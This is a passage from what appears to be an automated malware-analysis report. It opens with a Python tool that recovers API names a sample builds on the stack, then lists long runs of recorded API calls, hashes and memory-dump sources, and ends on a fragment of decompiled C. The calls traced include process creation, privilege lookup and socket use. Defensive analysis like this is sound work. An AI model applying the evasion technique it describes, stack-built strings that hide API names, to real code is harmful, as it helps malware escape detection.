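        last_end = m.end()
    flush()
    return results


def find_known_apis(code: bytes) -> List[str]:
    """Stack strings that spell a name in KNOWN_APIS, in discovery order."""
    return [s for s in recover_stack_strings(code) if s in KNOWN_APIS]


def _push(s: bytes) -> bytes:
    return b"\x68" + s.ljust(4, b"\x00")


def _mov_esp(disp: int, s: bytes) -> bytes:
    return b"\xc7\x44\x24" + bytes([disp]) + s.ljust(4, b"\x00")


# Constructed sample bytes (not taken from the analysed dump): closesocket
# and socket built with push, connect with mov [esp+disp], send with a
# preceding push 0 as terminator, separated by filler instructions.
SAMPLE_CODE = (
    _push(b"ket") + _push(b"esoc") + _push(b"clos")      # "closesocket"
    + b"\x8b\xc4"                                          # mov eax, esp
    + _push(b"et") + _push(b"sock")                        # "socket"
    + b"\x89\xe0"                                          # mov eax, esp
    + _mov_esp(0x04, b"ect") + _mov_esp(0x00, b"conn")     # "connect"
    + b"\x6a\x00" + _push(b"send")                         # push 0 ; "send"
    + b"\xff\xd0"                                          # call eax
)

if __name__ == "__main__":
    for name in find_known_apis(SAMPLE_CODE):
        print(name)
```

Run it on a raw code region carved from the dump (the 0x04DE0000 region referenced above, for instance) to list the names the sample resolves without ever storing them whole. Because it matches opcode bytes without decoding instruction boundaries, a 0x68 or 0xC7 inside another instruction's operand can produce a bogus fragment; treat the output as triage and confirm hits with a real disassembler.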

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID:
                                                    • API String ID: 2781271927-0
                                                    • Opcode ID: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
                                                    • Instruction ID: 098c2f0bf11df9cb2a2b310d59710313fe21618b7e0f7723835fb1334f1831a1
                                                    • Opcode Fuzzy Hash: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
                                                    • Instruction Fuzzy Hash: EE2108317186044BEB18EF28E84467A72D0FB99305F85467EFD8BC7286DB34D5418256
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                                    • Instruction ID: 071147ac26b9f43d410a6dcca35b5d6198e95be23c3f38d49043c781272fe291
                                                    • Opcode Fuzzy Hash: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                                    • Instruction Fuzzy Hash: 8C314C74A04B09DBDF75EF2988882A9B3E1FB48304F06427E8A5D8B207C730A550CFE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14B87,007A002E,00000000,00000060,00000000,00000000), ref: 00A19DAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 1dd9a3d7cd885e3125abb55380123d346d3c042f51c54728e01e16d3e0ac70f4
                                                    • Instruction ID: c5cf2e858817504ecdfadf04f20960fb42b51dadf3f127f28ed2435593355738
                                                    • Opcode Fuzzy Hash: 1dd9a3d7cd885e3125abb55380123d346d3c042f51c54728e01e16d3e0ac70f4
                                                    • Instruction Fuzzy Hash: C901B2B2201108AFCB18CF98DC95EEB77A9AF8C754F158248FA5DE7241C630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14B87,007A002E,00000000,00000060,00000000,00000000), ref: 00A19DAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction ID: 1187c5854c0afb9915b92f65c8a65003d0844e3212207dd3a078e15f733474c1
                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction Fuzzy Hash: 7AF0B2B2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtReadFile.NTDLL(00A14D42,5EB6522D,FFFFFFFF,00A14A01,?,?,00A14D42,?,00A14A01,FFFFFFFF,5EB6522D,00A14D42,?,00000000), ref: 00A19E55
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction ID: cb05f1a0ec9ddfd7c24abbb745b4c651ff5ce6671b9dc287b55ce13f808d1e6c
                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction Fuzzy Hash: 75F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1DA7241D630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(00A14D20,?,?,00A14D20,00000000,FFFFFFFF), ref: 00A19EB5
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 1df484b387129ec99071a44a2406f439f2fa3388181512fe12fc512186974af2
                                                    • Instruction ID: 37ba7e9f45006bf527cd577ab44516b6a669c996897b4855d9175de3dcc9d675
                                                    • Opcode Fuzzy Hash: 1df484b387129ec99071a44a2406f439f2fa3388181512fe12fc512186974af2
                                                    • Instruction Fuzzy Hash: 15E0C271200204BBEB10EFE4CC85FEB7B68EF54760F154169FA1CAB242D130E541CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(00A14D20,?,?,00A14D20,00000000,FFFFFFFF), ref: 00A19EB5
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction ID: 46b91f351483c4ed3f0b29dd4d10eb3ad3721ad96fb02925302c02546a4c89fa
                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction Fuzzy Hash: 75D012752002146BD710EB98CC85ED7776CEF44760F154455BA5C5B242C530F54086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2f0b5276a15747148de7c619442a146efa012d20f1ec861d5b5d890e39421475
                                                    • Instruction ID: 0067e8caa769b045b31d9d96d59a7f0d6112d547aee4c116d3785783f2f16b5e
                                                    • Opcode Fuzzy Hash: 2f0b5276a15747148de7c619442a146efa012d20f1ec861d5b5d890e39421475
                                                    • Instruction Fuzzy Hash: 2D9002712210C802D200A5A95408646000597E0341F51D125A5014595EC7A58DD17171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6b5aa947d131d31b117dd204ceb96ef30f6c68c91f752cfaa301666a71068017
                                                    • Instruction ID: a70a9b3cc584cfbe8a3e84e9cfb9a95e880f63445785daccfaf9ee0419aa98f9
                                                    • Opcode Fuzzy Hash: 6b5aa947d131d31b117dd204ceb96ef30f6c68c91f752cfaa301666a71068017
                                                    • Instruction Fuzzy Hash: 7F9002692330C402D280B169540860A000597D1242F91D529A0005598CCA558DA96361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f26b77340c1755db2da63b7527aa42cc98d78729ccfaa2e2cd92b5ec98df95af
                                                    • Instruction ID: f8f0473b85f6f09288dc5b31ba2f33719ba3ee3ee25cc16130494ff64065d881
                                                    • Opcode Fuzzy Hash: f26b77340c1755db2da63b7527aa42cc98d78729ccfaa2e2cd92b5ec98df95af
                                                    • Instruction Fuzzy Hash: 799002713311C802D210A1698404706000597D1241F51C525A0814598D87D58DD17162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d0d9b76895845eaac8931a386b667b24ed50ab1e57174d14d56ab7dc7015e136
                                                    • Instruction ID: 437562aede35cba08cd39f9de31b2b84182199d5eb04b01f6aa4ae2647bf860c
                                                    • Opcode Fuzzy Hash: d0d9b76895845eaac8931a386b667b24ed50ab1e57174d14d56ab7dc7015e136
                                                    • Instruction Fuzzy Hash: 0D9002612318C442D300A5794C14B07000597D0343F51C229A0144594CCA558DA16561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6bc18bfd0d62daef39a55f78c90aa85511d1d52618296646bfc50fd3690c74c2
                                                    • Instruction ID: 4b94b030d70befb37e2296c6ab3f7a766a0a598cd8df39750010e708ba9f96ed
                                                    • Opcode Fuzzy Hash: 6bc18bfd0d62daef39a55f78c90aa85511d1d52618296646bfc50fd3690c74c2
                                                    • Instruction Fuzzy Hash: DC9002712210CC02D210A169840474A000597D0341F55C525A4414698D87D58DD17161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 54a769ad0156e1e69285b1a22561bb13fc9c331f2425a0c5574fd07ffccfaf18
                                                    • Instruction ID: 047f4f91719766d421a0316a84da070dff577feaccb99d472ea174c092e56ca1
                                                    • Opcode Fuzzy Hash: 54a769ad0156e1e69285b1a22561bb13fc9c331f2425a0c5574fd07ffccfaf18
                                                    • Instruction Fuzzy Hash: 7F9002712210CC42D200A1694404B46000597E0341F51C12AA0114694D8755CD917561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b32dd7c5edf9bbbf56caf8ede5492b455993a9f57ff48013cceeb73ff43b2cba
                                                    • Instruction ID: c125a20b2d60fc21ccb774173cf0c08f3c5c190a4774322ec152b85e636c63df
                                                    • Opcode Fuzzy Hash: b32dd7c5edf9bbbf56caf8ede5492b455993a9f57ff48013cceeb73ff43b2cba
                                                    • Instruction Fuzzy Hash: 9D9002B12210C802D240B1694404746000597D0341F51C125A5054594E87998ED576A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ce5488367c53bd6dad29307b65c0403a52b88b8ece745b391e5ae19cdac7b546
                                                    • Instruction ID: ae0d6c5950aac511ab51b7ed6b32640bb2975624abc73028ac195819da5f5cab
                                                    • Opcode Fuzzy Hash: ce5488367c53bd6dad29307b65c0403a52b88b8ece745b391e5ae19cdac7b546
                                                    • Instruction Fuzzy Hash: 2B9002652310C4030205E5690704507004697D5391351C135F1005590CD7618DA16161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                     • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                     • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f9b4e7ff0608d4bbb01e716d2369f35fe06a0a63446623fd87c3b0d023f3f832
                                                    • Instruction ID: 2bf172ee750366ae5324a8729d015f8aa96ed4f203205a2ccd7b01fd91202ee4
                                                    • Opcode Fuzzy Hash: f9b4e7ff0608d4bbb01e716d2369f35fe06a0a63446623fd87c3b0d023f3f832
                                                    • Instruction Fuzzy Hash: 5A9002A13610C842D200A1694414B060005D7E1341F51C129E1054594D8759CD927166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 651c1b478a82e90f7a29e7959ec3a163de860bbbed7613b27f30f44bc6175f39
                                                    • Instruction ID: b1bb843f145af3d4be42066172dd0fa681fcb723b1c64a78d35eaea777c9ee4e
                                                    • Opcode Fuzzy Hash: 651c1b478a82e90f7a29e7959ec3a163de860bbbed7613b27f30f44bc6175f39
                                                    • Instruction Fuzzy Hash: 669002A12220C4034205B1694414616400A97E0241B51C135E10045D0DC6658DD17165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3e40dd5886857e0b78103a47b6e4751beda43f6d54a42bf71c3032946b3b6e3f
                                                    • Instruction ID: 85455793b223fde3e6f71c75b0319185baa877c3fa375492a337b5178d392a1f
                                                    • Opcode Fuzzy Hash: 3e40dd5886857e0b78103a47b6e4751beda43f6d54a42bf71c3032946b3b6e3f
                                                    • Instruction Fuzzy Hash: E09002712210C813D211A1694504707000997D0281F91C526A0414598D97968E92B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 30e2df34959df48ca0ea9c11fa174b17ba4611713c07c389a74366dffef494f5
                                                    • Instruction ID: 1b9bc8e658f16a8059cc56bd76357f4cb2bf9e21de0548dc858fded8bf894435
                                                    • Opcode Fuzzy Hash: 30e2df34959df48ca0ea9c11fa174b17ba4611713c07c389a74366dffef494f5
                                                    • Instruction Fuzzy Hash: 889002612620C5525645F16944045074006A7E0281791C126A1404990C86669D96E661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A03AF8), ref: 00A1A09D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction ID: 9f2a91bb1183f64a86fb540b344f62c0b5dfcae24325806caafaa52188e6d0ba
                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction Fuzzy Hash: 6FE01AB12002086BD714DF59CC45EA777ACEF88750F018554B91C57241C630E9108AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A0834A
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A0836B
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                                    • Instruction ID: 623658268a9bfb04bfc69816f631d2ae488f949051fa3738666e288c4d070bdd
                                                    • Opcode Fuzzy Hash: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                                    • Instruction Fuzzy Hash: 1901A231A8032C7BE720A698AD43FFE776CAB40F51F054118FF04BA1C1EAD4691646F6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 031632b71f2ba69030a5d943bafb50a32b626254bd08ac11305454c43b847921
                                                    • Instruction ID: f6d53cd5f20e5ca161d42db6c29bb6b77034dd2df4381c2ac65db69d2fd97a31
                                                    • Opcode Fuzzy Hash: 031632b71f2ba69030a5d943bafb50a32b626254bd08ac11305454c43b847921
                                                    • Instruction Fuzzy Hash: 4D015AB2204148ABCB24CFA9DC81DEB7BADEF9C750F058259FA5C97241C631E801CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A0AD42
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                    • Instruction ID: d83f740c03f74f682f22fec89e7940fbeec405475c91f9b6f3c0ba4d4cdb30bb
                                                    • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                    • Instruction Fuzzy Hash: BB011EB5D4020DBBDF10DBE4ED42FDDB7789B54318F104195E90897281F631EB548B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: c7b6a700f07a7a7c6a9bdc57f5028ac86590a87da9f292f9caa407c86771859d
                                                    • Instruction ID: 72dc9bda1e848bbe4475726515785268e3229ad1a942d91ec1ad550a1a611309
                                                    • Opcode Fuzzy Hash: c7b6a700f07a7a7c6a9bdc57f5028ac86590a87da9f292f9caa407c86771859d
                                                    • Instruction Fuzzy Hash: 7701CCB2201108AFCB58CF98CC81EEB77A9AF8C350F158218BA0DA3251C630E8418BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction ID: 7ef9e247f95564df5f45d12d45a49afacd9048b6b68a6515a4baa5f968e2f5c0
                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction Fuzzy Hash: 0701B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 744a41d26b75ddabc06fe888323c601f13b5f58476db9ccee4552cbbd2dd9abe
                                                    • Instruction ID: 98874e4665cfcf9f0ba99ea863320b1d0d85638a916e2ebadd1893ae4491973d
                                                    • Opcode Fuzzy Hash: 744a41d26b75ddabc06fe888323c601f13b5f58476db9ccee4552cbbd2dd9abe
                                                    • Instruction Fuzzy Hash: 33E052B6214009AF9B04DF99ED90CEB73AEABDC754B118609FA5DD3240D630E8528BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1A2,00A0F1A2,?,00000000,?,?), ref: 00A1A200
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction ID: f5c3544ed91ef2d24587d43be846afe849fdf93a118d2fc7de9c7f17c7c99641
                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction Fuzzy Hash: 72E01AB12002086BDB10DF49CC85EE737ADEF88650F018154BA0C67241C930E8508BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,00A08CF4,?), ref: 00A0F6CB
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                    • Instruction ID: eb5debf9b7bc6dbb13cf5fe6720a6e0cbb7f85945f1ecdb0305ad7c9f9e3ee41
                                                    • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                    • Instruction Fuzzy Hash: BBD0A7717903083BE610FBA89C03F6632CD6B44B00F490074FA48E73C3D950E4004165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 65ff83dc5778772190838898e0027d0fadf41a4d7415c9ae6cba4c2f86c96596
                                                    • Instruction ID: a1f699410c52c09d2ba44c7d6c32ba34929f6b6d8fefbaf2b55cb7667f0efcde
                                                    • Opcode Fuzzy Hash: 65ff83dc5778772190838898e0027d0fadf41a4d7415c9ae6cba4c2f86c96596
                                                    • Instruction Fuzzy Hash: 7EB09B719114C5C5D711D7704608717791477D0741F26C166D2020681A4778D5D1F5B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    C-Code - Quality: 53%
                                                    			E0330FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                    				void* _t7;
                                                    				intOrPtr _t9;
                                                    				intOrPtr _t10;
                                                    				intOrPtr* _t12;
                                                    				intOrPtr* _t13;
                                                    				intOrPtr _t14;
                                                    				intOrPtr* _t15;
                                                    
                                                    				_t13 = __edx;
                                                    				_push(_a4);
                                                    				_t14 =  *[fs:0x18];
                                                    				_t15 = _t12;
                                                    				_t7 = E032BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                    				_push(_t13);
